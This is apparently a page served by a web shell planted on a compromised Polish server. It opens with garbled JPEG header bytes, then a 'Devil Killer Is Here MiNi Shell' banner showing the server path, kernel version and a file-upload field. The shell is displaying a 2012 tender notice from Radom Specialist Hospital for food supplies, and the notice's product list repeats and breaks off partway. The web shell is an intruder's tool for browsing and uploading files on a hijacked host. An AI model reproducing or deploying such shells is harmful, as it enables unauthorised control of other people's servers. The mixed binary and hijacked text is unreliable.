JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121002/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121002/376298-N-2012.html

<p class="kh_header"><b>Radom: Ogłoszenie o przetargu nieograniczonym na zakup i dostawę  artykułów żywnościowych dla potrzeb Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 376298 - 2012; data zamieszczenia: 02.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ogłoszenie o przetargu nieograniczonym na zakup i dostawę  artykułów żywnościowych dla potrzeb Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I -Artykuły spożywcze
Lp.	           
                   Nazwa artykułu	
J.M.	
Orientacyjna ilość w okresie 2 lat
  1.	Ananas konserwowy w plastrach -wielkość opakowania jednostkowego-max 600g	kg	150
  2.	Aromat do ciast-różne zapachy rodzaj opakowania szklane	szt.	30
3.	Biszkopty- okrągłe wielkość opakowania jednostkowego max-200g	kg	300
4.	Barszcz czerwony
w torebce wielkość opakowania jednostkowego-max 60 g	kg	35
5.	Bazylia- mielona wielkość opakowania jednostkowego max-20g	kg	1
6.	Budyń waniliowy lub śmietankowy bez cukru w op. max. 80g	kg	300
7.	Cebulka konserwowa srebrna wielkość opakowania jednostkowego max-250g	kg	160
8.	Chrupki kukurydziane wielkość opakowania jednostkowego max-100g	kg	450
9.	Chrzan tarty wielkość opakowania jednostkowego max-300g	kg	360

10.	Cukier kryształ wielkość opakowania jednostkowego max-1kg	kg	17000
11.	Cukier puder wielkość opakowania jednostkowego max-500g	kg	25
12.
	Cukier wanilinowy wielkość opakowania jednostkowego max-40g	kg	120
13.	Czosnek mielony
suszony granulowany wielkość opakowania jednostkowego max-20g	kg	45
14.	Cynamon wielkość opakowania jednostkowego max-10g	kg	3
15.	Dżem porcjowany, różne smaki, wielkość opakowania jednostkowego -25g rodzaj opakowania plastikowe 	kg	1000
16.	Fasola konserwowa czerwona, wielkość opakowania max-500g	kg	350
17.	Fasola sucha Jaś średni wielkość opakowania jednostkowego max-5kg	kg	500
18.	Galaretka owocowa
różne smaki wielkość opakowania jednostkowego max-100g	kg	160
19.	Gałka muszkatołowa
Mielona wielkość opakowania jednostkowego max-20g	kg	2
20.	Groch suchy łuskany połówki wielkość opakowania jednostkowego max-5kg	kg	200
21.	Groszek konserwowy wielkość opakowania jednostkowego max-500g	kg	850
22.	Herbata liściasta, czarna, wielkość opakowania jednostkowego max-100g	kg	800
23.	Herbatniki wielkość opakowania jednostkowego max-100g	kg	500
24.	Imbir mielony wielkość opakowania jednostkowego max-20g	kg	3
25.	Kasza gryczana niepalona wielkość opakowania jednostkowego max-5kg	kg	600
26.	Kasza jęczmienna średnia wielkość opakowania jednostkowego max-500g	kg	3300
27.	Kasza manna błyskawiczna wielkość opakowania jednostkowego max-1kg	kg	3500
28.	Ketchup łagodny o
zawartości pomidorów powyżej 120g w 100g 
produktu wielkość opakowania jednostkowego max-1000g	kg	150
29.	Kisiel owocowy
różne smaki wielkość opakowania jednostkowego max-70g	kg	360
30.	Kleik ryżowy wielkość opakowania jednostkowego max-200g	kg	350

31.	Kostki rosołowe (drobiowe-,wołowe,)wielkość opakowania jednostkowego max-80g	kg	450
32.	Kostki grzybowe wielkość opakowania jednostkowego max-80g	kg	6
33.	Krakersy wielkość opakowania jednostkowego max-200g	kg	500
34.	Kukurydza konserwowa
Wielkość opakowania jednostkowego max-500g	kg	600
35.	Kwasek cytrynowy wielkość opakowania jednostkowego max-50g	kg	80
36.	Kminek wielkość opakowania jednostkowego max-20g	kg	1
37	Liście laurowe wielkość opakowania jednostkowego max-20g	kg	25
38.	Mleko w proszku wielkość opakowania jednostkowego max-1kg	kg	60
39	Majeranek wielkość opakowania jednostkowego max-20g	kg	50
40.	Majonez o zawartości tłuszczu od 60g i powyżej w 100g produktu wielkość opakowania jednostkowego max-250g	kg	450
41.	Przyprawa do zup
i sosów w płynie wielkość opakowania jednostkowego max-1L,opakowanie butelka szklana	kg	1000
42.	Mąka kukurydziana wielkość opakowania jednostkowego max-500g	kg	70
43.	Mąka pszennaTyp 500
Wielkość opakowania jednostkowego max-1kg	kg	8000
44.	Mąka ziemniaczana wielkość opakowania jednostkowego max-1kg	kg	500
45.	Miód pszczeli nektarowy wielokwiatowy porcjowany wielkość opakowania jednostkowego -25g rodzaj opakowania plastikowe	kg	1000
46.	Musztarda stołowa wielkość opakowania jednostkowego max-210g	kg	200
47.	Musztarda stołowa wielkość opakowania jednostkowego max-500g	kg	250
48.	Makaron z mąki wyprodukowanej z pszenicy durum, o różnym kształcie, wielkość opakowania jednostkowego max-1kg	kg	5000
49.
	Makaron ryżowy wielkość opakowania jednostkowego max-1kg	kg	20

50.
	Ocet spirytusowy10% wielkość opakowania jednostkowego max-1L	l	120
51.
	Ogórki konserwowe wielkość opakowania jednostkowego max-1L	kg	400
52.
	Olej rzepakowy wielkość opakowania jednostkowego max-1L	kg	2500
53.	Olej słonecznikowy wielkość opakowania jednostkowego max-1L	kg	600

54.	Paluszki(z sezamem, z makiem, solone)wielkość opakowania jednostkowego max-100g	kg	650

55.	Papryka konserwowa wielkość opakowania jednostkowego max-1L	kg	700

56.	Papryka sucha (ostra, słodka)wielkość opakowania jednostkowego max-20g	kg	20

57.	Koncentrat  pomidorowy 30% wielkość opakowania jednostkowego max-200g	kg	1300

58.	Pieprz naturalny mielony
Wielkość opakowania jednostkowego max-20g	kg	1200

59.	Proszek do pieczenia wielkość opakowania jednostkowego max-40g	kg	4

60.	Przyprawa do kurczaka
mielona wielkość opakowania jednostkowego max-40g	kg	10


61.	Płatki jęczmienne błyskawiczne wielkość opakowania jednostkowego max-1kg	kg	3000

62.	Ryż biały długoziarnisty wielkość opakowania jednostkowego max-1kg	kg	5500

63.	Sok marchwiowo - owocowy (jabłko, banan, 
morela)
bez zawartości cukru wielkość opakowania jednostkowego 175ml rodzaj opakowania -butelka szklana	szt	13500




64.	Syrop owocowy różne smaki wielkość opakowania jednostkowego max 500ml rodzaj opakowania-butelka szklana	kg	3500


65.	Sól jodowana wielkość opakowania jednostkowego max-1kg	kg	4000

66.	Seler konserwowy wiórki, wielkość opakowania jednostkowego max-350g	kg	80

67.	Sok owocowy
karton -różne smaki wielkość opakowania jednostkowego 0,2L rodzaj opakowania kartonik	szt.	350


68.	Sos słodko kwaśny
Wielkość opakowania jednostkowego max-600g	kg	100

69.	Sos sałatkowy różne smaki (grecki - winegrett,
koperkowo- ziołowy)
wielkość opakowania jednostkowego max-10g	kg	1


70.	Sos czekoladowy wielkość opakowania jednostkowego max-200g rodzaj opakowania butelka plastikowa	kg	5
71.	Sos sojowy ciemny wielkość opakowania jednostkowego max-250g rodzaj opakowania butelka szklana	kg	3
72.	Szczaw zielony konserwowy wielkość opakowania jednostkowego max-300g	kg	150
73.	Przyprawa warzywna w proszku lub granulkach wielkość opakowania max-100g	kg	600

74.	Ziele angielskie wielkość opakowania jednostkowego max-20g	kg	40

75.	Żelatyna spożywcza wielkość opakowania jednostkowego max-60g	kg	25

76.
	Brzoskwinie w syropie
wielkość opakowania jednostkowego max-600g	kg	60

77.	Śmietanka w sprayu wielkość opakowania jednostkowego  250g	szt.	100
78.
	Śmietanka  do kawy płynna wielkość opakowania jednostkowego 10g rodzaj opakowania plastik	szt.	4000
79.
	Oregano mielone wielkość opakowania jednostkowego max-20g	kg	2
80.
	Zioła prowansalskie wielkość opakowania jednostkowego max-20g	kg	2
81.
	Kawa zbożowa rozpuszczalna wielkość opakowania jednostkowego max-200g	kg	120
82.	Kakao naturalne wielkość opakowania jednostkowego max-100g	kg	12
83.
	Wafelki różne smaki
wielkość opakowania max-100g	kg	80

84.	Drożdże spożywcze
Wielkość opakowania jednostkowego max-100g	kg	5

85.	Przyprawa Gyros
Wielkość opakowania jednostkowego max-40g	kg	2

86.	Barszcz biały w płynie wielkość opakowania jednostkowego max-500g	kg	100
87.	Herbata ekspresowa, (czarna),  torebki, w opakowaniu 100 sztuk torebek 	Opakowanie 100sztuk torebek 	3600 Opakowań

Część II - Produkty spożywcze dla niemowlaków
L.P.	Nazwa produktu	Orientacyjna ilość kg sztuk/opakowań w okresie 2 lat
1.	Jabłuszko (przecier) po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	468 kg
2.	Jabłko+ marchewka po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	180 kg
3.	Marchewka po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	108 kg
4.	Zupka jarzynowa z warzywami + ryż po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	126 kg
5.	Jabłko + banan lub brzoskwinia, jagoda po 4 miesiącu życia, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	720 kg
6.	Kaszka do picia mleczno-ryżowa lub mleczno -kukurydziana po 4 miesiącu życia, 250ml, termin przydatności do spożycia nie mniej niż 6 miesięcy	900 kg
7.	Kaszka mleczna po 12 miesiącu życia, 250ml, termin przydatności do spożycia nie mniej niż 6 miesięcy	300 kg
8.	Marchewka z ryżem po 4 miesiącu życia, 125-150g, termin przydatności do nie mniej niż 6 miesięcy 	180 kg
9.	Jarzynowa z kurczakiem lub indykiem, królikiem, 125-150g, termin przydatności do spożycia nie mniej niż 6 miesięcy	792 kg
10.	Ryż z mięsem + warzywa po 12 miesiącu życia, 180-200g, termin przydatności do spożycia nie mniej niż 6 miesięcy	192 kg
11.	Mleko w proszku z kleikiem ryżowym po 6 miesiącu życia, 350g, termin przydatności do spożycia nie mniej niż 6 miesięcy	100,8 kg
12.	Herbatka granulat od 1 miesiąca życia koper włoski, rumianek, ułatwiająca trawienie,
Uspakajająca, 200g, termin przydatności do spożycia nie mniej niż 6 miesięcy	96 kg
13.	Kleik ryżowy po 4 miesiącu życia,
150-180g, termin przydatności do spożycia  nie mniej niż 6 miesięcy	43,2 kg
14.	Woda mineralna nie gazowana niskozmineralizowana 
o zawartości minerałów <500mg/l,
szczegółowo:
Ca  -      42-56 mg/l
Na  -      do 10,2 mg/l
Mg  -      5-35 mg/l
K -         do 30 mg/l
HCO3 - do 300 mg/l
Cl -        3,5-5,5 mg/l, 
butelka 0,5 litra
termin przydatności do spożycia nie mniej niż 6 miesięcy	9600 sztuk
15. 	Herbata ekspresowa,
(czarna) torebki  ok.2 gram  ze sznurkiem, pakowana po 100 torebek.
Termin przydatności do spożycia nie mniej niż 6 miesięcy	48 opakowań po 100 szt. torebek.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.12.00-4, 15.87.12.73-8, 15.33.00.00-0, 15.60.00.00-4, 15.87.00.00-7, 15.86.00.00-4, 15.87.12.50-1, 15.87.12.73-8, 15.89.10.00-8, 15.89.80.00-9, 15.41.11.00-3, 15.88.40.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument lub dokumenty z których będzie wynikać uprawnienie do podpisania oferty:
1) wpis do Krajowego Rejestru Sądowego lub ewidencji działalności gospodarczej, które mogą być złożone w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub
2) Pełnomocnictwo - w oryginale lub w postaci kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>20. Zamawiający  przewiduje  zmianę umowy zgodnie z &9 pkt.5 umowy. 
a) Ceny  brutto towarów mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa- mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, a cena netto pozostaje bez zmian 
b) Ceny  brutto  towarów mogą również ulec zmianie po upływie 6 miesięcy obowiązywania umowy o wskaźnik inflacji ogłoszony przez prezesa GUS za ostatni kwartał przed upływem sześciu miesięcy obowiązywania umowy i po każdym kolejnym kwartale.
c) Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny im Tytusa Chałubińskiego,Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia  ul. Lekarska 4,II piętro  pokój 316, 26-610 Radom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2012 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny im Tytusa Chałubińskiego,Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia  ul. Lekarska 4, III piętro pokój 308 lub 309, 26-610 Radom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I -Artykuły spożywcze
Lp.	           
                   Nazwa artykułu	
J.M.	
Orientacyjna ilość w okresie 2 lat
  1.	Ananas konserwowy w plastrach -wielkość opakowania jednostkowego-max 600g	kg	150
  2.	Aromat do ciast-różne zapachy rodzaj opakowania szklane	szt.	30
3.	Biszkopty- okrągłe wielkość opakowania jednostkowego max-200g	kg	300
4.	Barszcz czerwony
w torebce wielkość opakowania jednostkowego-max 60 g	kg	35
5.	Bazylia- mielona wielkość opakowania jednostkowego max-20g	kg	1
6.	Budyń waniliowy lub śmietankowy bez cukru w op. max. 80g	kg	300
7.	Cebulka konserwowa srebrna wielkość opakowania jednostkowego max-250g	kg	160
8.	Chrupki kukurydziane wielkość opakowania jednostkowego max-100g	kg	450
9.	Chrzan tarty wielkość opakowania jednostkowego max-300g	kg	360

10.	Cukier kryształ wielkość opakowania jednostkowego max-1kg	kg	17000
11.	Cukier puder wielkość opakowania jednostkowego max-500g	kg	25
12.
	Cukier wanilinowy wielkość opakowania jednostkowego max-40g	kg	120
13.	Czosnek mielony
suszony granulowany wielkość opakowania jednostkowego max-20g	kg	45
14.	Cynamon wielkość opakowania jednostkowego max-10g	kg	3
15.	Dżem porcjowany, różne smaki, wielkość opakowania jednostkowego -25g rodzaj opakowania plastikowe 	kg	1000
16.	Fasola konserwowa czerwona, wielkość opakowania max-500g	kg	350
17.	Fasola sucha Jaś średni wielkość opakowania jednostkowego max-5kg	kg	500
18.	Galaretka owocowa
różne smaki wielkość opakowania jednostkowego max-100g	kg	160
19.	Gałka muszkatołowa
Mielona wielkość opakowania jednostkowego max-20g	kg	2
20.	Groch suchy łuskany połówki wielkość opakowania jednostkowego max-5kg	kg	200
21.	Groszek konserwowy wielkość opakowania jednostkowego max-500g	kg	850
22.	Herbata liściasta, czarna, wielkość opakowania jednostkowego max-100g	kg	800
23.	Herbatniki wielkość opakowania jednostkowego max-100g	kg	500
24.	Imbir mielony wielkość opakowania jednostkowego max-20g	kg	3
25.	Kasza gryczana niepalona wielkość opakowania jednostkowego max-5kg	kg	600
26.	Kasza jęczmienna średnia wielkość opakowania jednostkowego max-500g	kg	3300
27.	Kasza manna błyskawiczna wielkość opakowania jednostkowego max-1kg	kg	3500
28.	Ketchup łagodny o
zawartości pomidorów powyżej 120g w 100g 
produktu wielkość opakowania jednostkowego max-1000g	kg	150
29.	Kisiel owocowy
różne smaki wielkość opakowania jednostkowego max-70g	kg	360
30.	Kleik ryżowy wielkość opakowania jednostkowego max-200g	kg	350

31.	Kostki rosołowe (drobiowe-,wołowe,)wielkość opakowania jednostkowego max-80g	kg	450
32.	Kostki grzybowe wielkość opakowania jednostkowego max-80g	kg	6
33.	Krakersy wielkość opakowania jednostkowego max-200g	kg	500
34.	Kukurydza konserwowa
Wielkość opakowania jednostkowego max-500g	kg	600
35.	Kwasek cytrynowy wielkość opakowania jednostkowego max-50g	kg	80
36.	Kminek wielkość opakowania jednostkowego max-20g	kg	1
37	Liście laurowe wielkość opakowania jednostkowego max-20g	kg	25
38.	Mleko w proszku wielkość opakowania jednostkowego max-1kg	kg	60
39	Majeranek wielkość opakowania jednostkowego max-20g	kg	50
40.	Majonez o zawartości tłuszczu od 60g i powyżej w 100g produktu wielkość opakowania jednostkowego max-250g	kg	450
41.	Przyprawa do zup
i sosów w płynie wielkość opakowania jednostkowego max-1L,opakowanie butelka szklana	kg	1000
42.	Mąka kukurydziana wielkość opakowania jednostkowego max-500g	kg	70
43.	Mąka pszennaTyp 500
Wielkość opakowania jednostkowego max-1kg	kg	8000
44.	Mąka ziemniaczana wielkość opakowania jednostkowego max-1kg	kg	500
45.	Miód pszczeli nektarowy wielokwiatowy porcjowany wielkość opakowania jednostkowego -25g rodzaj opakowania plastikowe	kg	1000
46.	Musztarda stołowa wielkość opakowania jednostkowego max-210g	kg	200
47.	Musztarda stołowa wielkość opakowania jednostkowego max-500g	kg	250
48.	Makaron z mąki wyprodukowanej z pszenicy durum, o różnym kształcie, wielkość opakowania jednostkowego max-1kg	kg	5000
49.
	Makaron ryżowy wielkość opakowania jednostkowego max-1kg	kg	20

50.
	Ocet spirytusowy10% wielkość opakowania jednostkowego max-1L	l	120
51.
	Ogórki konserwowe wielkość opakowania jednostkowego max-1L	kg	400
52.
	Olej rzepakowy wielkość opakowania jednostkowego max-1L	kg	2500
53.	Olej słonecznikowy wielkość opakowania jednostkowego max-1L	kg	600

54.	Paluszki(z sezamem, z makiem, solone)wielkość opakowania jednostkowego max-100g	kg	650

